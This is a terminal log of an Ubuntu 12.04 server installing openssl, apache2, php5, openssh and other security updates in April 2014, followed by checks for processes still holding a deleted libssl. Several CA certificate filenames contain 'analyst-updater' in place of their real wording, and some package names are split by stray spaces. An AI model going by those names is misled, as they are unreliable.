ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openssl amd64 1.0.1-4ubuntu5.12 [523 kB]\r\nGet:23 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 -prefork-dev amd64 2.2.22-1ubuntu1.5 [138 kB]\r\nGet:24 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 amd64 2.2.22-1ubuntu1.5 [1,494 B]\r\nGet:25 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 -mpm-prefork amd64 2.2.22-1ubuntu1.5 [2,400 B]\r\nGet:26 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 .2-common amd64 2.2.22-1ubuntu1.5 [226 kB]\r\nGet:27 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 .2-bin amd64 2.2.22-1ubuntu1.5 [1,339 kB]\r\nGet:28 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 -utils amd64 2.2.22-1ubuntu1.5 [91.3 kB]\r\nGet:29 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libapac he2-mod-php5 amd64 5.3.10-1ubuntu3.11 [3,137 kB]\r\nGet:30 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-my sql amd64 5.3.10-1ubuntu3.11 [76.6 kB]\r\nGet:31 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-xs l amd64 5.3.10-1ubuntu3.11 [14.0 kB]\r\nGet:32 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-cu rl amd64 5.3.10-1ubuntu3.11 [28.0 kB]\r\nGet:33 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-gd amd64 5.3.10-1ubuntu3.11 [38.8 kB]\r\nGet:34 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-cl i amd64 5.3.10-1ubuntu3.11 [3,051 kB]\r\nGet:35 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-sq lite amd64 5.3.10-1ubuntu3.11 [27.6 kB]\r\nGet:36 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-co mmon amd64 5.3.10-1ubuntu3.11 [1,797 kB]\r\nGet:37 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main icedtea -6-jre-cacao amd64 6b30-1.13.1-1ubuntu2~0.12.04.3 [776 kB]\r\nGet:38 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openjdk -6-jre-lib all 6b30-1.13.1-1ubuntu2~0.12.04.3 [6,211 kB]\r\nGet:39 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main icedtea -6-jre-jamvm amd64 6b30-1.13.1-1ubuntu2~0.12.04.3 [527 kB]\r\nGet:40 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openjdk -6-jre-headless amd64 6b30-1.13.1-1ubuntu2~0.12.04.3 [32.8 MB]\r\nGet:41 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main sudo amd64 1.8.3p1-1ubuntu3.6 [299 kB]\r\nGet:42 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main ifupdown amd64 0.7~beta2ubuntu11 [48.4 kB]\r\nGet:43 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main initramfs-tools all 0.99ubuntu13.5 [49.0 kB]\r\nGet:44 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main initramfs-tools-bin amd64 0.99ubuntu13.5 [9,782 B]\r\nGet:45 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main udev amd64 175-0ubuntu9.5 [314 kB]\r\nGet:46 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main ca-certificates all 20130906ubuntu0.12.04.1 [192 kB]\r\nGet:47 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openssh-server amd64 1:5.9p1-5ubuntu1.3 [338 kB]\r\nGet:48 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openssh-client amd64 1:5.9p1-5ubuntu1.3 [943 kB]\r\nGet:49 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libclamav6 amd64 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [4,208 kB]\r\nGet:50 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main clamav-base all 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [106 kB]\r\nGet:51 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main clamav-freshclam amd64 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [120 kB]\r\nGet:52 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main clamav amd64 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [140 kB]\r\nGet:53 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libpq-dev amd64 9.1.13-0ubuntu0.12.04 [215 kB]\r\nGet:54 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libpq5 amd64 9.1.13-0ubuntu0.12.04 [93.0 kB]\r\nGet:55 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main linux-firmware all 1.79.11 [27.7 MB]\r\nGet:56 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5 all 5.3.10-1ubuntu3.11 [1,076 B]\r\nGet:57 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main postgresql-9.1 amd64 9.1.13-0ubuntu0.12.04 [4,307 kB]\r\nGet:58 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main postgresql-client-9.1 amd64 9.1.13-0ubuntu0.12.04 [959 kB]\r\nGet:59 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main udisks amd64 1.0.4-5ubuntu2.2 [250 kB]\r\nFetched 108 MB in 26s (4,140 kB/s)\r\nExtract templates from packages: 100%\r\nPreconfiguring packages ...\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace libssl-doc 1.0.1-4ubuntu5.11 (using .../libssl-doc_1.0.1-4ubuntu5.12_all.deb) ...\r\nUnpacking replacement libssl-doc ...\r\nPreparing to replace libssl-dev 1.0.1-4ubuntu5.11 (using .../libssl-dev_1.0.1-4ubuntu5.12_amd64.deb) ...\r\nUnpacking replacement libssl-dev ...\r\nPreparing to replace libssl1.0.0 1.0.1-4ubuntu5.11 (using .../libssl1.0.0_1.0.1-4ubuntu5.12_amd64.deb) ...\r\nDe-configuring libssl1.0.0:i386 ...\r\nUnpacking replacement libssl1.0.0 ...\r\nPreparing to replace libssl1.0.0:i386 1.0.1-4ubuntu5.11 (using .../libssl1.0.0_1.0.1-4ubuntu5.12_i386.deb) ...\r\nUnpacking replacement libssl1.0.0:i386 ...\r\nProcessing triggers for man-db ...\r\nSetting up libssl1.0.0 (1.0.1-4ubuntu5.12) ...\r\nSetting up libssl1.0.0:i386 (1.0.1-4ubuntu5.12) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace libudev0:i386 175-0ubuntu9.4 (using .../libudev0_175-0ubuntu9.5_i386.deb) ...\r\nDe-configuring libudev0 ...\r\nUnpacking replacement libudev0:i386 ...\r\nPreparing to replace libudev0 175-0ubuntu9.4 (using .../libudev0_175-0ubuntu9.5_amd64.deb) ...\r\nUnpacking replacement libudev0 ...\r\nSetting up libudev0:i386 (175-0ubuntu9.5) ...\r\nSetting up libudev0 (175-0ubuntu9.5) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace libgtk-3-bin 3.4.2-0ubuntu0.6 (using .../libgtk-3-bin_3.4.2-0ubuntu0.7_amd64.deb) ...\r\nLeaving \\'diversion of /usr/sbin/update-icon-caches to /usr/sbin/update-icon-caches.gtk2 by libgtk-3-bin\\'\r\nLeaving \\'diversion of /usr/share/man/man8/update-icon-caches.8.gz to /usr/share/man/man8/update-icon-caches.gtk2.8.gz by libgtk-3-bin\\'\r\nUnpacking replacement libgtk-3-bin ...\r\nPreparing to replace libgtk-3-0 3.4.2-0ubuntu0.6 (using .../libgtk-3-0_3.4.2-0ubuntu0.7_amd64.deb) ...\r\nUnpacking replacement libgtk-3-0 ...\r\nPreparing to replace libgtk-3-common 3.4.2-0ubuntu0.6 (using .../libgtk-3-common_3.4.2-0ubuntu0.7_all.deb) ...\r\nUnpacking replacement libgtk-3-common ...\r\nPreparing to replace libgudev-1.0-0:i386 1:175-0ubuntu9.4 (using .../libgudev-1.0-0_1%3a175-0ubuntu9.5_i386.deb) ...\r\nDe-configuring libgudev-1.0-0 ...\r\nUnpacking replacement libgudev-1.0-0:i386 ...\r\nPreparing to replace libgudev-1.0-0 1:175-0ubuntu9.4 (using .../libgudev-1.0-0_1%3a175-0ubuntu9.5_amd64.deb) ...\r\nUnpacking replacement libgudev-1.0-0 ...\r\nProcessing triggers for man-db ...\r\nProcessing triggers for libglib2.0-0 ...\r\nProcessing triggers for libglib2.0-0:i386 ...\r\nSetting up libgudev-1.0-0:i386 (1:175-0ubuntu9.5) ...\r\nSetting up libgudev-1.0-0 (1:175-0ubuntu9.5) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace libnss3-1d 3.15.4-0ubuntu0.12.04.1 (using .../libnss3-1d_3.15.4-0ubuntu0.12.04.2_amd64.deb) ...\r\nUnpacking replacement libnss3-1d ...\r\nPreparing to replace libnss3:i386 3.15.4-0ubuntu0.12.04.1 (using .../libnss3_3.15.4-0ubuntu0.12.04.2_i386.deb) ...\r\nDe-configuring libnss3 ...\r\nUnpacking replacement libnss3:i386 ...\r\nPreparing to replace libnss3 3.15.4-0ubuntu0.12.04.1 (using .../libnss3_3.15.4-0ubuntu0.12.04.2_amd64.deb) ...\r\nUnpacking replacement libnss3 ...\r\nSetting up libnss3:i386 (3.15.4-0ubuntu0.12.04.2) ...\r\nSetting up libnss3 (3.15.4-0ubuntu0.12.04.2) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace librsvg2-common:i386 2.36.1-0ubuntu1 (using .../librsvg2-common_2.36.1-0ubuntu1.1_i386.deb) ...\r\nUnpacking replacement librsvg2-common:i386 ...\r\nPreparing to replace librsvg2-2:i386 2.36.1-0ubuntu1 (using .../librsvg2-2_2.36.1-0ubuntu1.1_i386.deb) ...\r\nUnpacking replacement librsvg2-2:i386 ...\r\nPreparing to replace file 5.09-2ubuntu0.2 (using .../file_5.09-2ubuntu0.3_amd64.deb) ...\r\nUnpacking replacement file ...\r\nPreparing to replace libmagic1 5.09-2ubuntu0.2 (using .../libmagic1_5.09-2ubuntu0.3_amd64.deb) ...\r\nUnpacking replacement libmagic1 ...\r\nPreparing to replace tzdata-java 2013g-0ubuntu0.12.04 (using .../tzdata-java_2014a-0ubuntu0.12.04_all.deb) ...\r\nUnpacking replacement tzdata-java ...\r\nPreparing to replace tzdata 2013g-0ubuntu0.12.04 (using .../tzdata_2014a-0ubuntu0.12.04_all.deb) ...\r\nUnpacking replacement tzdata ...\r\nProcessing triggers for libgdk-pixbuf2.0-0:i386 ...\r\nProcessing triggers for man-db ...\r\nSetting up tzdata (2014a-0ubuntu0.12.04) ...\r\n\r\nCurrent default time zone: \\'Etc/GMT\\'\r\nLocal time is now: Wed Apr 9 12:04:24 GMT 2014.\r\nUniversal Time is now: Wed Apr 9 12:04:24 UTC 2014.\r\nRun \\'dpkg-reconfigure tzdata\\' if you wish to change it.\r\n\r\n(Reading database ... 159289 files and directories currently installed.)\r\nPreparing to replace php5-cgi 5.3.10-1ubuntu3.10 (using .../php5-cgi_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-cgi ...\r\nPreparing to replace openssl 1.0.1-4ubuntu5.11 (using .../openssl_1.0.1-4ubuntu5.12_amd64.deb) ...\r\nUnpacking replacement openssl ...\r\nPreparing to replace apache2-prefork-dev 2.2.22-1ubuntu1.4 (using .../apache2-prefork-dev_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2-prefork-dev ...\r\nPreparing to replace apache2 2.2.22-1ubuntu1.4 (using .../apache2_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2 ...\r\nPreparing to replace apache2-mpm-prefork 2.2.22-1ubuntu1.4 (using .../apache2-mpm-prefork_2.2.22-1ubuntu1.5_amd64.deb) ...\r\n * Stopping web server apache2 ... waiting . [ OK ]\r\nUnpacking replacement apache2-mpm-prefork ...\r\nPreparing to replace apache2.2-common 2.2.22-1ubuntu1.4 (using .../apache2.2-common_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2.2-common ...\r\nPreparing to replace apache2.2-bin 2.2.22-1ubuntu1.4 (using .../apache2.2-bin_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2.2-bin ...\r\nPreparing to replace apache2-utils 2.2.22-1ubuntu1.4 (using .../apache2-utils_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2-utils ...\r\nPreparing to replace libapache2-mod-php5 5.3.10-1ubuntu3.10 (using .../libapache2-mod-php5_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement libapache2-mod-php5 ...\r\nPreparing to replace php5-mysql 5.3.10-1ubuntu3.10 (using .../php5-mysql_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-mysql ...\r\nPreparing to replace php5-xsl 5.3.10-1ubuntu3.10 (using .../php5-xsl_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-xsl ...\r\nPreparing to replace php5-curl 5.3.10-1ubuntu3.10 (using .../php5-curl_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-curl ...\r\nPreparing to replace php5-gd 5.3.10-1ubuntu3.10 (using .../php5-gd_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-gd ...\r\nPreparing to replace php5-cli 5.3.10-1ubuntu3.10 (using .../php5-cli_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-cli ...\r\nPreparing to replace php5-sqlite 5.3.10-1ubuntu3.10 (using .../php5-sqlite_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-sqlite ...\r\nPreparing to replace php5-common 5.3.10-1ubuntu3.10 (using .../php5-common_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-common ...\r\nPreparing to replace icedtea-6-jre-cacao 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../icedtea-6-jre-cacao_6b30-1.13.1-1ubuntu2~0.12.04.3_amd64.deb) ...\r\nUnpacking replacement icedtea-6-jre-cacao ...\r\nPreparing to replace openjdk-6-jre-lib 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../openjdk-6-jre-lib_6b30-1.13.1-1ubuntu2~0.12.04.3_all.deb) ...\r\nUnpacking replacement openjdk-6-jre-lib ...\r\nPreparing to replace icedtea-6-jre-jamvm 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../icedtea-6-jre-jamvm_6b30-1.13.1-1ubuntu2~0.12.04.3_amd64.deb) ...\r\nUnpacking replacement icedtea-6-jre-jamvm ...\r\nPreparing to replace openjdk-6-jre-headless 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../openjdk-6-jre-headless_6b30-1.13.1-1ubuntu2~0.12.04.3_amd64.deb) ...\r\nUnpacking replacement openjdk-6-jre-headless ...\r\nPreparing to replace sudo 1.8.3p1-1ubuntu3.4 (using .../sudo_1.8.3p1-1ubuntu3.6_amd64.deb) ...\r\nUnpacking replacement sudo ...\r\nPreparing to replace ifupdown 0.7~beta2ubuntu10 (using .../ifupdown_0.7~beta2ubuntu11_amd64.deb) ...\r\nUnpacking replacement ifupdown ...\r\nPreparing to replace initramfs-tools 0.99ubuntu13.4 (using .../initramfs-tools_0.99ubuntu13.5_all.deb) ...\r\nUnpacking replacement initramfs-tools ...\r\nPreparing to replace initramfs-tools-bin 0.99ubuntu13.4 (using .../initramfs-tools-bin_0.99ubuntu13.5_amd64.deb) ...\r\nUnpacking replacement initramfs-tools-bin ...\r\nPreparing to replace udev 175-0ubuntu9.4 (using .../udev_175-0ubuntu9.5_amd64.deb) ...\r\nAdding \\'diversion of /sbin/udevadm to /sbin/udevadm.upgrade by fake-udev\\'\r\nUnpacking replacement udev ...\r\nPreparing to replace ca-certificates 20111211 (using .../ca-certificates_20130906ubuntu0.12.04.1_all.deb) ...\r\nUnpacking replacement ca-certificates ...\r\nPreparing to replace openssh-server 1:5.9p1-5ubuntu1.1 (using .../openssh-server_1%3a5.9p1-5ubuntu1.3_amd64.deb) ...\r\nUnpacking replacement openssh-server ...\r\nPreparing to replace openssh-client 1:5.9p1-5ubuntu1.1 (using .../openssh-client_1%3a5.9p1-5ubuntu1.3_amd64.deb) ...\r\nUnpacking replacement openssh-client ...\r\nPreparing to replace libclamav6 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../libclamav6_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_amd64.deb) ...\r\nUnpacking replacement libclamav6 ...\r\nPreparing to replace clamav-base 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../clamav-base_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_all.deb) ...\r\nUnpacking replacement clamav-base ...\r\nPreparing to replace clamav-freshclam 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../clamav-freshclam_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_amd64.deb) ...\r\n * Stopping ClamAV virus database updater freshclam [ OK ]\r\nUnpacking replacement clamav-freshclam ...\r\nPreparing to replace clamav 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../clamav_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_amd64.deb) ...\r\nUnpacking replacement clamav ...\r\nPreparing to replace libpq-dev 9.1.12-0ubuntu0.12.04 (using .../libpq-dev_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\nUnpacking replacement libpq-dev ...\r\nPreparing to replace libpq5 9.1.12-0ubuntu0.12.04 (using .../libpq5_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\nUnpacking replacement libpq5 ...\r\nPreparing to replace linux-firmware 1.79.10 (using .../linux-firmware_1.79.11_all.deb) ...\r\nUnpacking replacement linux-firmware ...\r\nPreparing to replace php5 5.3.10-1ubuntu3.10 (using .../php5_5.3.10-1ubuntu3.11_all.deb) ...\r\nUnpacking replacement php5 ...\r\nPreparing to replace postgresql-9.1 9.1.12-0ubuntu0.12.04 (using .../postgresql-9.1_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\n * Stopping PostgreSQL 9.1 database server [ OK ]\r\nUnpacking replacement postgresql-9.1 ...\r\nPreparing to replace postgresql-client-9.1 9.1.12-0ubuntu0.12.04 (using .../postgresql-client-9.1_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\nUnpacking replacement postgresql-client-9.1 ...\r\nPreparing to replace udisks 1.0.4-5ubuntu2.1 (using .../udisks_1.0.4-5ubuntu2.2_amd64.deb) ...\r\nUnpacking replacement udisks ...\r\nProcessing triggers for man-db ...\r\nProcessing triggers for ureadahead ...\r\nProcessing triggers for ufw ...\r\nSetting up bind9 (1:9.8.1.dfsg.P1-4ubuntu0.8) ...\r\n * Starting domain name service... bind9 [fail]\r\ninvoke-rc.d: initscript bind9, action \\\"start\\\" failed.\r\ndpkg: error processing bind9 (--configure):\r\n subprocess installed post-installation script returned error exit status 1\r\nSetting up libssl-doc (1.0.1-4ubuntu5.12) ...\r\nSetting up libssl-dev (1.0.1-4ubuntu5.12) ...\r\nSetting up libgtk-3-common (3.4.2-0ubuntu0.7) ...\r\nSetting up libgtk-3-0 (3.4.2-0ubuntu0.7) ...\r\nSetting up libgtk-3-bin (3.4.2-0ubuntu0.7) ...\r\nSetting up libnss3-1d (3.15.4-0ubuntu0.12.04.2) ...\r\nSetting up librsvg2-2:i386 (2.36.1-0ubuntu1.1) ...\r\nSetting up librsvg2-common:i386 (2.36.1-0ubuntu1.1) ...\r\nSetting up libmagic1 (5.09-2ubuntu0.3) ...\r\nSetting up file (5.09-2ubuntu0.3) ...\r\nSetting up tzdata-java (2014a-0ubuntu0.12.04) ...\r\nSetting up php5-common (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-cgi (5.3.10-1ubuntu3.11) ...\r\nSetting up openssl (1.0.1-4ubuntu5.12) ...\r\nSetting up apache2.2-bin (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2-utils (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2.2-common (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2-prefork-dev (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2-mpm-prefork (2.2.22-1ubuntu1.5) ...\r\n * Starting web server apache2 [ OK ]\r\nSetting up apache2 (2.2.22-1ubuntu1.5) ...\r\nSetting up libapache2-mod-php5 (5.3.10-1ubuntu3.11) ...\r\n * Reloading web server config apache2 [ OK ]\r\nSetting up php5-cli (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-mysql (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-xsl (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-curl (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-gd (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-sqlite (5.3.10-1ubuntu3.11) ...\r\nSetting up sudo (1.8.3p1-1ubuntu3.6) ...\r\nInstalling new version of config file /etc/init.d/sudo ...\r\nSetting up ifupdown (0.7~beta2ubuntu11) ...\r\nSetting up initramfs-tools-bin (0.99ubuntu13.5) ...\r\nSetting up ca-certificates (20130906ubuntu0.12.04.1) ...\r\nUpdating certificates in /etc/ssl/certs... 21 added, 9 removed; done.\r\nRunning hooks in /etc/ca-certificates/update.d....\r\nAdding debian:Actalis_Authentication_analyst-updater_CA.pem\r\nAdding debian:Buypass_Class_2_analyst-updater_CA.pem\r\nAdding debian:Buypass_Class_3_analyst-updater_CA.pem\r\nAdding debian:CA_Disig_analyst-updater_R1.pem\r\nAdding debian:CA_Disig_analyst-updater_R2.pem\r\nAdding debian:China_Internet_Network_Information_Center_EV_Certificates_analyst-updater.pem\r\nAdding debian:D-TRUST_analyst-updater_Class_3_CA_2_2009.pem\r\nAdding debian:D-TRUST_analyst-updater_Class_3_CA_2_EV_2009.pem\r\nAdding debian:EC-ACC.pem\r\nAdding debian:EE_Certification_Centre_analyst-updater_CA.pem\r\nAdding debian:Hellenic_Academic_and_Research_Institutions_analyst-updaterCA_2011.pem\r\nAdding debian:PSCProcert.pem\r\nAdding debian:Security_Communication_analyst-updaterCA2.pem\r\nAdding debian:StartCom_Certification_Authority_2.pem\r\nAdding debian:StartCom_Certification_Authority_G2.pem\r\nAdding debian:Swisscom_analyst-updater_CA_2.pem\r\nAdding debian:Swisscom_analyst-updater_EV_CA_2.pem\r\nAdding debian:Trustis_FPS_analyst-updater_CA.pem\r\nAdding debian:T-TeleSec_Globalanalyst-updater_Class_3.pem\r\nAdding debian:TURKTRUST_Certificate_Services_Provider_analyst-updater_2007.pem\r\nAdding debian:Verisign_Class_3_Public_Primary_Certification_Authority_2.pem\r\nRemoving debian:cacert.org.pem\r\nRemoving debian:ca.pem\r\nRemoving debian:Equifax_Secure_eBusiness_CA_2.pem\r\nRemoving debian:TC_TrustCenter_Universal_CA_III.pem\r\nRemoving debian:TC_TrustCenter__Germany__Class_2_CA.pem\r\nRemoving debian:TC_TrustCenter__Germany__Class_3_CA.pem\r\nRemoving debian:Verisign_Class_2_Public_Primary_Certification_Authority.pem\r\nRemoving debian:Verisign_Class_4_Public_Primary_Certification_Authority_-_G2.pem\r\nRemoving debian:spi-ca-2003.pem\r\ndone.\r\ndone.\r\nSetting up openssh-client (1:5.9p1-5ubuntu1.3) ...\r\nSetting up openssh-server (1:5.9p1-5ubuntu1.3) ...\r\nssh stop/waiting\r\nssh start/running, process 14149\r\nSetting up libclamav6 (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nSetting up clamav-base (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nReplacing config file /etc/clamav/clamd.conf with new version\r\nSetting up clamav-freshclam (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nInstalling new version of config file /etc/init.d/clamav-freshclam ...\r\nReplacing config file /etc/clamav/freshclam.conf with new version\r\n * Starting ClamAV virus database updater freshclam [ OK ]\r\nSetting up clamav (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nSetting up libpq5 (9.1.13-0ubuntu0.12.04) ...\r\nSetting up libpq-dev (9.1.13-0ubuntu0.12.04) ...\r\nSetting up linux-firmware (1.79.11) ...\r\nSetting up php5 (5.3.10-1ubuntu3.11) ...\r\nSetting up postgresql-client-9.1 (9.1.13-0ubuntu0.12.04) ...\r\nSetting up postgresql-9.1 (9.1.13-0ubuntu0.12.04) ...\r\n * Starting PostgreSQL 9.1 database server [ OK ]\r\nSetting up openjdk-6-jre-headless (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up openjdk-6-jre-lib (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up icedtea-6-jre-cacao (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up icedtea-6-jre-jamvm (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up udev (175-0ubuntu9.5) ...\r\nudev stop/waiting\r\nudev start/running, process 16013\r\nRemoving \\'diversion of /sbin/udevadm to /sbin/udevadm.upgrade by fake-udev\\'\r\nupdate-initramfs: deferring update (trigger activated)\r\nSetting up udisks (1.0.4-5ubuntu2.2) ...\r\nSetting up initramfs-tools (0.99ubuntu13.5) ...\r\nupdate-initramfs: deferring update (trigger activated)\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\nProcessing triggers for libgdk-pixbuf2.0-0:i386 ...\r\nProcessing triggers for initramfs-tools ...\r\nupdate-initramfs: Generating /boot/initrd.img-3.2.0-60-generic\r\nSetting up bind9 (1:9.8.1.dfsg.P1-4ubuntu0.8) ...\r\n * Starting domain name service... bind9 [fail]\r\ninvoke-rc.d: initscript bind9, action \\\"start\\\" failed.\r\ndpkg: error processing bind9 (--configure):\r\n subprocess installed post-installation script returned error exit status 1\r\nErrors were encountered while processing:\r\n bind9\r\nE: Sub-process /usr/bin/dpkg returned an error code (1)\r\nanalyst-updater@h2072833:~# ps uwwp $(sudo find /proc -maxdepth 2 -name maps -exec grep -HE \\'/libssl\\\\.so.* \\\\(deleted\\\\)\\' {} \\\\; | cut -d/ -f3 | sort -u)\r\nERROR: List of process IDs must follow p.\r\n********* simple selection ********* ********* selection by list *********\r\n-A all processes -C by command name\r\n-N negate selection -G by real group ID (supports names)\r\n-a all w/ tty except session leaders -U by real user ID (supports names)\r\n-d all except session leaders -g by session OR by effective group name\r\n-e all processes -p by process ID\r\nT all processes on this terminal -s processes in the sessions given\r\na all w/ tty, including other users -t by tty\r\ng OBSOLETE -- DO NOT USE -u by effective user ID (supports names)\r\nr only running processes U processes for specified users\r\nx processes w/o controlling ttys t by tty\r\n*********** output format ********** *********** long options ***********\r\n-o,o user-defined -f full --Group --User --pid --cols --ppid\r\n-j,j job control s signal --group --user --sid --rows --info\r\n-O,O preloaded -o v virtual memory --cumulative --format --deselect\r\n-l,l long u user-oriented --sort --tty --forest --version\r\n-F extra full X registers --heading --no-heading --context\r\n ********* misc options *********\r\n-V,V show version L list format codes f ASCII art forest\r\n-m,m,-L,-T,H threads S children in sum -y change -l format\r\n-M,Z security data c true command name -c scheduling class\r\n-w,w wide output n numeric WCHAN,UID -H process hierarchy\r\nanalyst-updater@h2072833:~# ls -l /proc/*/fd | grep ssl.*(deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\n\r\nanalyst-updater@h2072833:~# openssl version\r\nOpenSSL 1.0.1 14 Mar 